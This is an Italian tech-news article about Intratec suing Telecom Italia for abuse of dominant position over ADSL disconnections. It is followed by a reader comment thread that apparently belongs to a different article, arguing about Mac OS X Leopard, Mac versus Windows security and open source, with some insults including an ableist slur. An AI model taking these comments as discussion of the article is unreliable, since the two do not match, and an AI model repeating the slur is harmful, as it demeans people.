Intratec chiede 11 milioni di danni a Telecom

Durissima iniziativa legale dell'operatore che ritiene di aver subìto ingiustamente le disconnessioni eseguite dall'incumbent nei mesi scorsi

Roma – È una di quelle vicende che tutti ricordano: non solo ha messo in luce la sostanziale fragilità del mercato italiano della banda larga ma anche, e soprattutto, ha lasciato a terra moltissimi utenti. È la querelle tra Telecom Italia e Intratec, deflagrata la scorsa estate quando l’incumbent ha deciso di staccare le linee di Intratec/Vira.

Come si ricorderà, Intratec/Vira, e per la verità anche altri operatori di cui Punto Informatico si è occupato in varie occasioni, rivendevano ai consumatori e alle aziende il servizio di telecomunicazione acquistato da Telecom Italia. Improvvisamente, nel breve volgere di qualche settimana, si sono trovati sulla soglia del fallimento dopoché Telecom, sostenendo di vantare imponenti crediti, ha interrotto i servizi ADSL. I clienti Intratec, tra gli altri, si sono quindi trovati senza connettività.

La vicenda ha sollevato allarme tra tutti i provider proprio perché mette in luce quanto siano fragili, al di là delle dichiarazioni di principio, le basi del mercato TLC italiano.

Dopo aver cercato soluzioni in grado di garantire la continuità dei servizi nei confronti degli utenti, Intratec ha annunciato ieri di aver agito di fronte alla Corte d’Appello di Roma: in quella sede ha denunciato Telecom Italia per abuso di posizione dominante e ha chiesto 11 milioni di euro di danni .

In particolare, rileva Punto Informatico , l’azienda sostiene che l’esecuzione del contratto di fornitura da parte di Telecom si sarebbe risolto in un comportamento illecito: nel contratto vi sarebbero clausole inique ai danni dei concorrenti dell’azienda. Non solo: si accusa Telecom di gestire la “fase di crisi” in un modo del tutto anomalo rispetto a “ordinari parametri di diligenza professionale”, quelli insomma che dovrebbero, da codice, regolamentare i rapporti contrattuali tra le imprese.

Intratec lamenta anche il fatto che Telecom, a suo dire, avrebbe rifiutato qualsiasi forma di soluzione pacifica, una soluzione che avrebbe consentito all’azienda di onorare gli impegni con i propri clienti. Una soluzione era stata individuata anche con il subentro di una società capace di azzerare il debito. Soluzioni del genere sono all’ordine del giorno, spiega Intratec, tanto che proprio queste hanno impedito che venissero meno anche i servizi VoIP del provider, forniti da società che hanno garantito la continuità dei servizi. Ne aveva parlato anche PI: gli utenti del VoIP di Vira/Intratec hanno avuto un passaggio indolore, grazie alla disponibilità (ben remunerata, si presume) degli operatori alternativi a Telecom Italia di fornirgli il sevizio VoIP al fine della rivendita all’utente finale. Per contro, come accennato e come si ricorderà, agli utenti ADSL è andata molto peggio .

Secondo il legale della Società, Fulvio Sarzana di S.Ippolito dello studio legale www.lidis.it che con l’Avv. Fabio Cesare sta seguendo l’iter del risarcimento, “Telecom avrebbe pervicacemente rifiutato di percorrere soluzioni concordate alla crisi di Intratec, come la conclusione di un contratto di cessione dell’azienda a terzi o la formalizzazione di un accordo di ristrutturazione a cui il creditore sarebbe obbligato per legge al fine di non aggravare la posizione debitoria della Società ed evitare il possibile fallimento, con l’aggravante che la stessa Telecom dopo avere provveduto alla sospensione delle linee Intratec, ha reso disponibile a molti utenti Intratec il collegamento con la pagina iniziale di Alice, facendone la prima pagina visualizzata al momento dell’accesso in internet”.

“Questo comportamento”, spiega Sarzana a Punto Informatico , “evidenzia, secondo la Società, il reale intento di Telecom Italia ovvero l’intenzione di riacquisire fette di mercato dell’ADSL a scapito di chi potrebbe concorrere con la stessa Telecom con gravi danni del cittadino consumatore che si è trovato nell’impossibilità di scegliere il fornitore più gradito e nella grave condizione di essere privato dell’accesso ad internet”.

Sul delicato fronte della concorrenza nel settore e sul ruolo di Telecom, come noto, a fine ottobre l’Antitrust ha aperto un procedimento per valutare se l’incumbent abbia abusato o meno della propria posizione dominante. Una indagine non casuale, evidentemente: alcuni competitor di Telecom parlano di una politica commerciale “aggressiva”, basata su offerte stracciate , pensate per riportare in seno a Telecom i clienti che hanno cambiato operatore o che intendono farlo. Pratiche di win back che alcuni ritengono illegali.

In attesa di conoscere e pubblicare su queste pagine la posizione di Telecom Italia sulla denuncia presentata da Intratec, una valutazione più generale emerge con assoluta chiarezza. Queste vicende dimostrano infatti che al di là del cosiddetto “scorporo” della rete Telecom e dei “rimedi” di cui si parla in questi mesi, in verità si stia consumando a spese degli utenti una battaglia di posizione. Una guerra commerciale che, anziché determinare l’apertura del mercato delle comunicazioni, rischia di provocare una ulteriore riduzione del grado di concorrenza nei servizi ADSL, e dunque delle possibilità di scelta da parte degli utenti.

La tua email sarà utilizzata per comunicarti se qualcuno risponde al tuo commento e non sarà pubblicato. Dichiari di avere preso visione e di accettare quanto previsto dalla informativa privacy

  • alez cerutti scrive:
    leopard e i suoi difetti
    ma vorrei sapere dove stanno scomparendo uso leopard da due giorni e in tanti anni di windows non ho mai riscontrato così tanti problemi, un consiglio se avete tiger tenetevelo stretto io sto pensando di reinstallarlo e la mia copia la terrò nella speranza di nuovi aggiornamenti che risolvano i problemi o meglio dire aspetterò la vera versione definitiva e non questa demo
  • mac e grafica scrive:
    leopard e grafica... ma ho visto male?
    ciao a tutti scusate io sto pensando a comprare un mac con leopard e mi hanno detto che ci sono tanti programmi inclusi... sto guardando sul sito ma mi sembra veramente assurdo che non ci sia niente per disegnare o fotoritocco... insomma mac è un pc dedicato da sempre alla grafica, hanno tolto il tasto mela, e ora tolgono anche la grafica? certo, ci sono programmi pro, una spesa in piu.. ma invece di garageband non era piu ovvio includere un bel programma di disegno o grafica?!?!?!??!?!?o entrambi :)insomma ho visto male? eiiii non palatemi dei giochini di iphoto, ci sono freeware migliori vedi picasa, ma da quel che vedo non c'e' proprio NIENTE per disegnare.. neanche un PAINT alla windows ? :(
    • FinalCut scrive:
      Re: leopard e grafica... ma ho visto male?
      - Scritto da: mac e grafica
      ciao a tutti scusate io sto pensando a comprare
      un mac con leopard e mi hanno detto che ci sono
      tanti programmi inclusi... sto guardando sul sito
      ma mi sembra veramente assurdo che non ci sia
      niente per disegnare o fotoritocco... insomma mac
      è un pc dedicato da sempre alla grafica, hanno
      tolto il tasto mela, e ora tolgono anche la
      grafica?perché scusa quando mai photoshop è in boundle su Win o Mac? (newbie)
      certo, ci sono programmi pro, una spesa in piu..
      ma invece di garageband non era piu ovvio
      includere un bel programma di disegno o
      grafica?!?!?!??!?!?

      o entrambi :)no perché in America podcast e youtube per i giovani sono più popolari di photoshop e grafica
      insomma ho visto male? eiiii non palatemi dei
      giochini di iphoto, ci sono freeware migliori
      vedi picasaassolutamente, Picasa è un ottimo software ma non è all'altezza di iPhoto, forse dici così perché non lo hai mai usato seriamente
      ma da quel che vedo non c'e' proprio
      NIENTE per disegnare.. neanche un PAINT alla
      windows ?
      :(ti lamenti di iPhoto e poi parli di Paint? dici sul serio (rotfl)guarda puoi usare Gimp (opensource quindi free) oppurehttp://www.pixelmator.com (circa 59$) oppurePhotoshop Elements (circa 90$) o se sei un professionistati compri Photoshop CS3 e/o Aperture e/o Lightroomoppure ti attacchi al "mulo" e fai quello che vuoi,mi pare che di scelte tu ne abbia parecchie...(linux)(apple)
      • mac grafica scrive:
        Re: leopard e grafica... ma ho visto male?


        perché scusa quando mai photoshop è in boundle su
        Win o Mac?
        (newbie)beh e' in bundle con tante stampanti e scanner da 100 euro. su un computer da 3 milioni sinceramente qualcosina potrebbero metteresei l unico utente mac finora che difende questa assurdita'..nel weekend ho incontrato amici con apple che difatti pensano che sia veraente assurdocioe'... garagaband idvd imovie. ok ma per DISEGNARE?!?!?io voglio disegnare un cerchio rosso, con un computer da 3 milioni che e' nato per la grafica.
        no perché in America podcast e youtube per i
        giovani sono più popolari di photoshop e
        graficaok allora e' vero che apple fa solo marketing e ipod.. e si e' dimenticata le radicie comunqe google uno dei primi programi che diffusè fu picasa... evidentemente a qualcuno interessasu un MAC poi !!!! la grafica....
        assolutamente, Picasa è un ottimo software ma non
        è all'altezza di iPhoto, forse dici così perché
        non lo hai mai usato
        seriamenteiphoto un programma serio ?ok dicci quanto ti danno e chi, perche devi essere pagato bene per definire quei giochini di leopard per programmi seri. utili, ok, ma non sono programmi seri o professionali. sono giochini, tutorial, procedure guidate per newbie.

        ma da quel che vedo non c'e' proprio

        NIENTE per disegnare.. neanche un PAINT alla

        windows ?

        :(

        ti lamenti di iPhoto e poi parli di Paint? dici
        sul serio
        (rotfl)cavoli paint c'e'. macpaint e' stato abbandonato. e' indifendibile eh la scelta ma ok ti pagano.
        oppure ti attacchi al "mulo" e fai quello che
        vuoi,
        mi pare che di scelte tu ne abbia parecchie...che scelta professionale veramente.
        • FinalCut scrive:
          Re: leopard e grafica... ma ho visto male?
          - Scritto da: mac grafica



          perché scusa quando mai photoshop è in boundle su

          Win o Mac?

          (newbie)


          beh e' in bundle con tante stampanti e scanner da
          100 euro. su un computer da 3 milioni
          sinceramente qualcosina potrebbero
          metterein boundle ci mettono solo photoshop elements e non la CS3 e comunque la stampante o lo scanner se ti interessa la grafica puoi comprarla anche per Mac...
          cioe'... garagaband idvd imovie. ok ma per
          DISEGNARE?!?!?

          io voglio disegnare un cerchio rosso, con un
          computer da 3 milioni che e' nato per la
          grafica.ti ho dato diverse alternative di software da 0 a 2.000 in base alle diverse esigenze, cosa vuoi di più?
          ok allora e' vero che apple fa solo marketing e
          ipod.. e si e' dimenticata le
          radicile radici? cioe? ad un professionista gli dai in boundle Photoshop elements?
          e comunqe google uno dei primi programi che
          diffusè fu picasa... evidentemente a qualcuno
          interessa Con Picasa non puoi disegnare nemmeno un cerchio rosso non ci credi guarda:http://picasa.google.com/features/index.htmlPicasa:Organise|Edit|Share|Print|Backup|CreateNon c'è scritto "Draw" e nemmeno "Paint"...

          assolutamente, Picasa è un ottimo software ma
          non

          è all'altezza di iPhoto, forse dici così perché

          non lo hai mai usato

          seriamente


          iphoto un programma serio ?Si ha tutte le funzioni di Picasa, più qualcosa che Picasa non ha.Confrontali pure:http://www.apple.com/ilife/iphoto/http://picasa.google.com/features/index.htmle dimmi quali differenze vedi...
          ok dicci quanto ti danno e chi, perche devi
          essere pagato bene per definire quei giochini di
          leopard per programmi seri.Ciao (troll) io ti *PLONKO* qui.(linux)(apple)
          • mac grafica scrive:
            Re: leopard e grafica... ma ho visto male?
            caro finacutTu non usi Apple, non conosci Apple e non ami Apple.lo dimostri continuamente con i tuoi scritti qui, e con la tua ignoranza su cosa Apple e'.Per favore, trova modi più costruttivi di parlar male di un sistema che non conosci. ps - i primi PC mac (il termine personal computer lo ha coniato la apple, ti informo) li accendevi e disegnavi. ok? apple E' il computer per disegnare e far grafica, ed è completamente assurdo che NON ci sia niente di niente in un sistema completo, sicuro e perfetto come Leopard. E lo direi anche se mi pagassero loro :D
          • bibop scrive:
            Re: leopard e grafica... ma ho visto male?
            - Scritto da: mac grafica
            caro finacut

            Tu non usi Apple, non conosci Apple e non ami
            Apple.

            lo dimostri continuamente con i tuoi scritti qui,
            e con la tua ignoranza su cosa Apple
            e'.

            Per favore, trova modi più costruttivi di parlar
            male di un sistema che non conosci.scusa tanto ma dopo aver letto di tutto in questo thread (ed essermi anche divertito) arrivo a questo stralcio di assurdo totale. premessa:il mac non e' un pc per fare grafica, il mac e' stato, ed e', scelto come piattaforma d'eccellenza dai grafici, perche' in origine era l'unico che permettesse l'impaginazione wysiwyg (http://en.wikipedia.org/wiki/WYSIWYG), oltre alla facilita' di gestione e manutenzione, quei primi mac facevano miracoli se paragonati alle alternative, il mito del mac per la grafica e' perdurato e perdura e non si pensa mai a quanto i mac siano penetrati e indispensabili per l'audio, o per l'educational (ma non in italia purtroppo) poi che si confondano le cose e' un altro discorso... oggi chi preferisce mac ad altri lo fa per valutazioni personali varie, dalla necessita' al consiglio alla moda, e nessuna di queste motivazioni e' questionabile come tanti fanno sui forum. mio cognato dopo 2 settimane e senza chiedermi niente riesce a navigare, gestire la macchina fotografica digitale, la musica... ha già masterizzato un paio di dvd con menu' interattivi... tutto con un macbook e non avendo mai usato un pc, mai in senso assoluto!!considerazioni:non so chi sia finalcut non so che precedenti abbia e non mi interessa, ma un attacco come il tuo e' immotivato visto che alla tua richiesta di informazioni (che puzza di malafede e provocazione, considerando le risposte sconclusionate che dai) il sig. finalcut ha dato risposte pacate, cortesi e CORRETTE...........mac NON e' quindi pc per la GRAFICA, se cmq ti interessa paint cerca paintbrush, se parli male di iphoto vuol dire che nn sai di cosa stai parlando, per il cerchio rosso cerca DrawBerry, poi grazie a coreimage ci sono una quantita' di piccoli software per la manipolazione delle immagini che danno risultati degni di photoshop, almeno per gli effetti e i filtri tenendo come riferimento l'utente consumer, poi c'e' graphicconverter, una sorta di mini photoshop, a pagamento ma pienamente funzionante anche se con un delay all'avvio...ma la verita' e' che tutto quello che hai scritto puzza di provocazione, dici castronerie, o mezze verita', facendo finta di apprezzare l'oggetto... thurrott e' un maestro, ma lui almeno a certi livelli non si abbassacordiali saluti.
  • FinalCut scrive:
    La verità sulla sicurezza tra Mac e PC
    Vi consiglio di leggervi questa illuminante vivisezione dell'analisi fatta da CNET basata su Secunia;http://www.roughlydrafted.com/2007/12/20/vista-vs-mac-os-x-security-why-george-ous-zdnet-vulnerability-numerology-is-absurd/#more-1389Ci sono perle come il fatto che nonostante Microsoft spergiuri davanti alle autorità antitrust di tutto il mondo il fatto che Explorer SIA PARTE INTEGRANTE DELL'OS i suoi bug per Secunia non vengano sommati a quelli del sistema operativo (Vista o XP) mentre quelli di Safari vengono sommati ad OS X!Altre perle e che siano state addebitate a Mac OS X falle di Flash Player, Java, Opera...oppure l'analisi delle criticità:for Mac OS X:- 16% of the listed vulnerabilities threatened the potential for system access- 10% threatened to expose sensitive data or system info- the largest amount, 29%, were only denial of service attackswhile under Windows Vista:- 43% of the vulnerabilities threatened to provide to system access- 24% threatened to expose sensitive data or system info- only 5% were limited to threatening a denial of service attacpoi ognuno è libero di usare il suo sistema preferito...(linux)(apple)
  • FinalCut scrive:
    Luca è troppo comodo!
    http://punto-informatico.it/b.aspx?i=2147002&m=2148596#p2148596 in breve: non ho capito perche' secondo te chi critica apple... usa Windowsnon so che elementi hai per dire cosa uso, e questo e' il tuo modo obiettivo di parlare della questione. fra l'altro hai la memoria corta, abbiamo già parlato sui forum a proposito di apple. ma gia'.. chi critica Apple usa Windows.Chi usa Apple non critica piu' niente, lobotomizzato (?). bah, torno a preparare Download... Luca è troppo comodo postare un'affermazione e chiudere il post ai reply! ti rispondo qui al tuo post.1) qual è il subject del post? risposta: " MAC OS X più vulnerabile di Windows "Ergo, si sta parlando di Mac OS e Windows ....2) Tu usi XP come OS prevalente e me lo hai pure scritto un paio...Ergo, tu usi Windows (e forse qualcos'altro)3) Adesso puoi pure tornare a preparare " Download "(linux)(apple)
    • applelike scrive:
      Re: Luca è troppo comodo!

      Luca è troppo comodo postare un'affermazione e
      chiudere il post ai reply! ti rispondo qui al tuo
      post.lucchetto? l avra' messo il moderatore.. porca miseria hai una opinione veramente oRenda di questo redattore se pensi che lancia il sasso e poi mette il lucchetto :D
      2) Tu usi XP come OS prevalente e me lo
      hai pure scritto un
      paio...

      Ergo, tu usi Windows (e forse
      qualcos'altro)beh forse la scelta migliore visto che il 99 per cento degli utenti mac parla di win solo per sentito dire...o forse per inteloquire con vossignoria bisogna usare apple al 51% ? :D :D :D
  • pippo75 scrive:
    mettere in regole, varie e altro.

    ma passata l'ondata di freddo che ha investito
    l'Italia è sparito pure il problema delle
    tastiere congelate dei MacBookmi aspetto quindi a luglio le tastiere fuse :).comunque
    così da mettere in regola tutti i Mac di casa
    aggiornandoli alla nuova versionecosa si inteder per mettere in regola?le correzioni sono uscite per tutte le versioni di leopard? in contemporaneo oppure scaglionate?
    • FinalCut scrive:
      Re: mettere in regole, varie e altro.


      così da mettere in regola tutti i Mac di casa

      aggiornandoli alla nuova versione

      cosa si inteder per mettere in regola?
      Riferito al "Family Pack", cioè con 50 in più ti porti a casa ben 5 licenze Mac OS X e puoi aggiornare in maniera legale fino a 5 computer Mac.La gente ha comprato in larga parte i Family Pack non per via di qualche fantomatica "activation key (Mac OS X non la richiede) ma per stare a posto con la propria coscienza (e la Guarda di Finanza).(linux)(apple)
  • FinalCut scrive:
    Al network CNBC usano Apple Xsan!
    http://macdailynews.com/index.php/weblog/comments/15845/What surprised me as I was touring the IT infrastructure with CNBC's director of digital production and broadcast technology, Gary Kanofsky, and graphics engineer Rich Tallmadge, was one of the broadcast giant's storage area networks. It was an Apple Xsan.But while CNBC's graphics design team does mostly use Mac (40 Mac editing stations to be exact), there are a couple of PCs attached to the Xsan, proving that it can indeed support Windows.[yt]HQByiz1DVOM[/yt](linux)(apple)PS: Anche quelli di "South Park" usano la stessa identica soluzione.
  • freeeak scrive:
    era ora! anche se...
    finalmente un competitor in piu nel mercato degli SO. anche se continuo a pensare che il mac sia piu una questione di moda che altro, a parte certi campi specifici.
  • CSOE scrive:
    I buoni prodotti chiusi vendono ancora
    Sarà per moda, sarà per la semplicità, sarà per l'affidabilità... Apple cresce e fa soldi.Ma Apple vende la tecnologia più chiusa del mercato, non solo il software ma anche l'hardware è proprietario ( per non parlare dei formati).Segno evidente che chi raccoglie i favori del pubblico è l'industria, che investe, produce innovazione e paga bene programmatori e designer.Il FOOS (Free and Open Source Software) non si diffonde neppure gratis. E' una buona notizia per Natale ! Grazie P.I.-----------------------------------------------------------Modificato dall' autore il 20 dicembre 2007 15.41-----------------------------------------------------------
    • Lollete scrive:
      Re: I buoni prodotti chiusi vendono ancora
      - Scritto da: CSOE
      Il FOOS (Free and Open Source Software) non si
      diffonde neppure gratis.


      E' una buona notizia per Natale !
      Grazie P.I.Ma di che parli?Firefox ha una fetta di mercato incredibile, ed e` openApache ha una fetta di mercato incredibile, ed e` openLinux ha una fetta di mercato incredibile, ed e` openCome mai? Perche` qualcuno evidentemente investe nell'open (e parliamo di Google, IBM e company, non di gente qualunque...).Il fatto che un sw sia open/closed non implica che sia buono/cattivo. Dipende da come e` sviluppato.
    • MeX scrive:
      Re: I buoni prodotti chiusi vendono ancora
      - Scritto da: CSOE
      ma anche l'hardware
      è proprietario LOL non sapevo che la Intel e la ATI fossero di Apple :)
      • CSOE scrive:
        Re: I buoni prodotti chiusi vendono ancora


        ma anche l'hardware

        è proprietario

        LOL non sapevo che la Intel e la ATI fossero di
        Apple :)Fai finta di non capire, ma almeno in Microsoft posso scegliere il produttore hardware e le schede.. in Mac no, specifiche chiuse.
        • MeX scrive:
          Re: I buoni prodotti chiusi vendono ancora
          ma scusa... tutti a smaronare con "l'espandiblità" allora mi spieghi perchè la vendita di portatili ha superato quella dei desktop? Forse perchè al 90% delle persone interessa non avere UN CASSONE con un groviglio di fili sulla scrivania?
    • alexjenn scrive:
      Re: I buoni prodotti chiusi vendono ancora
      Eppure il codice base di Mac OS X, Darwin, è Open.Eh, l'ignoranza, l'ignoranza...
      • CSOE scrive:
        Re: I buoni prodotti chiusi vendono ancora
        - Scritto da: alexjenn
        Eppure il codice base di Mac OS X, Darwin, è Open.

        Eh, l'ignoranza, l'ignoranza...non più... Eh, l'arretratezza.. l'arretratezza...http://www.macitynet.it/macprof/aA24657/index.shtml
        • alexjenn scrive:
          Re: I buoni prodotti chiusi vendono ancora
          Hai ragione...Mannaggia!Adesso mi tocca pagare ben 129 euro per Leopard, oppure 199 per 5 licenze, oppure ce l'ho già su un nuovo Mac.Ma era così anche prima...Ahi ahi ahi ahi...Beh, almeno sono sicuro che avrò aggiornamenti continui e un sistema robusto e facile da usare...Ah, e posso farci girare tutte le distro Linux...
        • PLONK_THIS scrive:
          Re: I buoni prodotti chiusi vendono ancora
          - Scritto da: CSOE
          - Scritto da: alexjenn

          Eppure il codice base di Mac OS X, Darwin, è
          Open.



          Eh, l'ignoranza, l'ignoranza...

          non più...

          Eh, l'arretratezza.. l'arretratezza...

          http://www.macitynet.it/macprof/aA24657/index.shtme questo secondo te cosa sarebbe?http://www.opensource.apple.com/darwinsource/10.5/e immagino che xnu-1228 ti dica pure qualcosa, no?
        • slide scrive:
          Re: I buoni prodotti chiusi vendono ancora
          - Scritto da: CSOE
          - Scritto da: alexjenn

          Eppure il codice base di Mac OS X, Darwin, è
          Open.



          Eh, l'ignoranza, l'ignoranza...

          non più...

          Eh, l'arretratezza.. l'arretratezza...

          http://www.macitynet.it/macprof/aA24657/index.shtmposta anche questo, no?http://www.macitynet.it/macity/aA24695/index.shtml
    • AtariLover scrive:
      Re: I buoni prodotti chiusi vendono ancora
      Ciao CSOESebbene abbiamo visioni diametralmente opposte sul software libero, vorrei risponderti perchè alla fine probabilmente la ragione tra me e te sta nel mezzo.Apple vende, sicuro. Hai ragione quando parli di software chiuso che riesce ancora ad imporsi.Attenzione però, Aplle è ANCHE codice aperto.Pochi mesi fa Apple ha comprato CUPS, il Common Unix Printing System e lo sta portando avanti ancora come open, anzi patchandolo laddove arrivano bug con l'aiuto della comunità.Apple risparmia sui suoi collaboratori (con l'aiuto di volontari della comunità), la comunità ci guadagna laddove Cups viene sostenuto e sviluppato da un'azienda a cui serve (ergo ci spende dietro quattrini).Risultato: Apple a tutti gli utenti hano a disposizione un ottimo programma avanzato per stampare.Io capisco quello ceh tu dici quando affermi che l'opensource non esiste senza aziende che finanziano. È vero.Se i progetti open source non avessero dietro aziende che li finanziano, ora sarebbero MOLTO indietro rispetto a come sono ora.Ed è anche vero che se non esistesse la GPL probabilmente il codice aperto renderebbe solo alle aziende che prenderebbero codice a man bassa e gratuito.Invece qui abbiamo un prendere e ricevere, dove ci guadagnano entrambi.Tu contesti il fatto che i programmatori sono turlupinati ma non è così. Se sei bravo vieni pagato.Ad esempio per restare su CUPS Apple ha assunto gli sviluppatori originali.Insomma ci sono sicuramente luci ed ombre sull'Open source, ma cerchiamo di vedere sopratutto le luci e ricordiamoci TUTTI che non è una guerra di religione. È solo un altro modello di businnes.Spero mi risponderai.Saluti(atari)P.S: Naturalmente ad Apple fa anche comodo il fatto che CUPS non passi a una eventuale GPLv3 ;) non sono proprio stupidi e anche loro non fanno certo beneficienza.Inoltre alcuni moduli non derivati dalle librerie CUPS da quello che avevo letto erano licenziati diversamente e solo per MacOS-----------------------------------------------------------Modificato dall' autore il 20 dicembre 2007 17.51-----------------------------------------------------------
  • Ricky scrive:
    Sara' ma intanto...
    Mentre dite ste belle cose su Leopard i portatili si schiantano.Alcuni lamentano problemi di masterizzazione in formato DVD,reggono solo le masterizzazioni cd.Un portatile da 2400 euro con un masterizzatore 8x...un TTSCORP del piffero a costo infimo che per giunta si schianta dopo qualche mese e con un utilizzo sporadico.E per fortuna che sono pc di PRIMA SCELTA,CURATI E CONTROLLATI.MA va' va' va'...
    • lellykelly scrive:
      Re: Sara' ma intanto...
      hw e sw non sono la stessa cosae sei OTcomunque per quello che costano pretenderei più sicurezza nei componenti
    • MeX scrive:
      Re: Sara' ma intanto...
      mi posti 1 link al riguardo.GRazie!
    • PLONK_THIS scrive:
      Re: Sara' ma intanto...
      a me risulta che da OS si masterizza pure dvd blue ray cosa che toast non supporta ancorahttp://forum.macbidouille.com/index.php?s=501e933a4d7911302f8e26ffb639506b&showtopic=247392&pid=2474108&st=0entry2474108
  • novantesimo avvio scrive:
    Ricreazione finita
    Cari bimbi e' ora di ritornare in classe, smettetela di giocare ai winali, linari, macosxari, su basta si torna a studiare che ne avete bisogno tutti.
    • lellykelly scrive:
      Re: Ricreazione finita
      devono ancora decidere chi terrà lo scettro del potere
      • Mythos scrive:
        Re: Ricreazione finita
        - Scritto da: lellykelly
        devono ancora decidere chi terrà lo scettro del
        potereNon mi risulta.Per ora me lo tengo stretto..
        • LBDV scrive:
          Re: Ricreazione finita
          Peccato sia di cartone con arrotolato intorno la stagnola.
          • anonimo01 scrive:
            Re: Ricreazione finita
            - Scritto da: LBDV
            Peccato sia di cartone con arrotolato intorno la
            stagnola.quella è la sua pipa da crack :D(crack...degli eseguibili! che avevate capito? no dai T1000, posa quell'ascia, non mi moderare...no dai non occorreeehahaaaaaaaaaaa!EOF
  • Pietro scrive:
    Anche vista inizia a essere più veloce
    Uno dei più grandi problemi di Vista è la velocità, è noto a tutti che Vista è nettamente più lento di XP.Adesso però le cose stanno cambiando, grazie a macchine dedicate anche Vista è in grado di esprimere al meglio le sue doti.http://www.lastampa.it/_web/cmstp/tmplrubriche/giornalisti/grubrica.asp?ID_blog=31&ID_articolo=110&ID_sezione=39&sezione=
    • HeroProtagonist scrive:
      Re: Anche vista inizia a essere più veloce
      Peccato che le migliori performance di Vista si abbiano con.... Mac Intel!!
      • Pietro scrive:
        Re: Anche vista inizia a essere più veloce
        Windows non è compatibile a livello binario con i processori PPC quindi...
        • lellykelly scrive:
          Re: Anche vista inizia a essere più veloce
          quindi su un mac funziona
          • Pietro scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: lellykelly
            quindi su un mac funzionanon ho capito, certo che su un mac intel windows funziona e molto meglio che sui pc
          • lellykelly scrive:
            Re: Anche vista inizia a essere più veloce
            dalla tua fraseScritto da pietroWindows non è compatibile a livello binario con i processori PPC quindi...si evince che il mac abbia ancora il ppcma non si capisce che forse intendevi dire "ovvioche va sui mac intel e non sio ppc"ho capito giusto?
          • Pietro scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: lellykelly
            dalla tua frase

            Scritto da pietro
            Windows non è compatibile a livello binario con i
            processori PPC
            quindi...

            si evince che il mac abbia ancora il ppc
            ma non si capisce che forse intendevi dire
            "ovvioche va sui mac intel e non sio
            ppc"

            ho capito giusto?scusa, se posto un articolo dove dice che vista è più veloce sui mac intel, mi sembra ovvio che volevo dire: "ovvio che va sui mac intel e non sui ppc"
        • HeroProtagonist scrive:
          Re: Anche vista inizia a essere più veloce
          mai sentito che da 2 anni i Mac hanno intel inside?Ah, capperi... dimenticavo che i Mac non hanno adesivi di sorta...
          • Pietro scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: HeroProtagonisPeccato che le migliori performance di Vista si abbiano con.... Mac Intel!!Scritto da pietroWindows non è compatibile a livello binario con i processori PPC quindi...- Scritto da: HeroProtagonist
            mai sentito che da 2 anni i Mac hanno intel
            inside?
            Ah, capperi... dimenticavo che i Mac non hanno
            adesivi di
            sorta...osa stai cercando di dire? Coraggio dillo ancora, con calma, con parole tue...
          • HeroProtagonist scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: Pietro
            - Scritto da: HeroProtagonis
            Peccato che le migliori performance di Vista si
            abbiano con.... Mac
            Intel!!

            Scritto da pietro
            Windows non è compatibile a livello binario con i
            processori PPC
            quindi...

            - Scritto da: HeroProtagonist

            mai sentito che da 2 anni i Mac hanno intel

            inside?

            Ah, capperi... dimenticavo che i Mac non hanno

            adesivi di

            sorta...

            osa stai cercando di dire?
            Coraggio dillo ancora, con calma, con parole
            tue...mi sembra molto semplice.Il fatto che Vista dia il meglio di se girando su macchine Apple é a tutti gli effetti un ossimoro. Implica il fatto che un utente Windows che voglia sfruttare al massimo le potenzialitá di una qualsiasi versione di Vista sia "costretto" a comprare un hardware Apple. Tutto qui, semplice, lineare, logico.Hei Lelly... ma 'sto qui ci é o ci fá?
          • lellykelly scrive:
            Re: Anche vista inizia a essere più veloce
            credo si sia espresso male
          • Pietro scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: lellykelly
            credo si sia espresso maleForse vi siete persi la "sfumatura" ironica del primo post
          • Io blocco il P2P scrive:
            Re: Anche vista inizia a essere più veloce
            - Scritto da: Pietro
            - Scritto da: lellykelly

            credo si sia espresso male
            Forse vi siete persi la "sfumatura" ironica del
            primo
            postForse sei un mongoloide e ce ne siamo accorti.
    • FDG scrive:
      Re: Anche vista inizia a essere più veloce
      - Scritto da: Pietro
      Adesso però le cose stanno cambiando, grazie a
      macchine dedicate anche Vista è in grado di
      esprimere al meglio le sue doti.Dote numero uno: far girare l'economia... di chi ti vende l'hardware nuovo.
    • russian pirate scrive:
      Re: Anche vista inizia a essere più veloce
      - Scritto da: Pietro
      Adesso però le cose stanno cambiando, grazie a
      macchine dedicate anche Vista è in grado di
      esprimere al meglio le sue
      doti.ahahahahahaha....Ma lo sai che è più veloce copiare un file da PC a PC (sullo stesso PC tra due hard disk diversi), VIA RETE, facendo l'operazione su Mac, che copiarlo da PC a PC, sempre sullo stesso PC, da Vista.E' talmente lenta la copia dei file in Vista, che tra hdd e hdd locale e rete passando per Samba, è più veloce la rete !!!
  • Pasquale Cacazza scrive:
    Annunziata
    Cara Annunziata, ti ho vista in fotografia... anchio ho la passione per il mac. Se mi da un indirizzo Email ti mando la mia foto. Cosi chissa... questo natale potremmo essere felici.il tuo Pasquale
    • Luca Annunziata scrive:
      Re: Annunziata
      Caro Pasquale,Mi spiace sinceramente deluderti, ma sono felicemente fidanzato. :(Ma non preoccuparti: per ogni porta che si chiude, si apre sempre un portone! ;)Teneramente tuo,Luca
  • PLONK_THIS scrive:
    x saxpaxtrollax
    ci commenti questi dati e per una volta senza svicolare come stai facendo da un paio di giorni?http://secunia.com/graph/?type=adv&period=all∏...http://secunia.com/graph/?type=adv&period=all∏...http://secunia.com/graph/?type=adv&period=2007&pro...dopo tutta la panoplia di scempiaggini che hai disseminato nel forum, siamo tutti curiosi leggere qualcosa di sensato da parte tua...utopico regalo natalizio, ovvio, ma è natale e perché non sognare.
    • lellykelly scrive:
      Re: x saxpaxtrollax
      link?
      • PLONK_THIS scrive:
        Re: x saxpaxtrollax
        altro che svicola...credo tu sappia navigare da solo e leggere nei suoi reply odierni alla news in oggetto e in quelli di ieri relativi a questa news "Apple stucca 31 falle di Mac OS X"altro giro altro troll? che giornata!
    • PLONK_THIS scrive:
      Re: x saxpaxtrollax
      altro che svicola...credo tu sappia navigare da solo e leggere nei suoi reply odierni alla news in oggetto e in quelli di ieri relativi a questa news "Apple stucca 31 falle di Mac OS X"altro giro altro troll? che giornata!
    • saxpax scrive:
      Re: x saxpaxtrollax
      la verità fa male, ma devi ammetterlo, Mac OS X è più vulnerabile di Windows .
      • alexjenn scrive:
        Re: x saxpaxtrollax
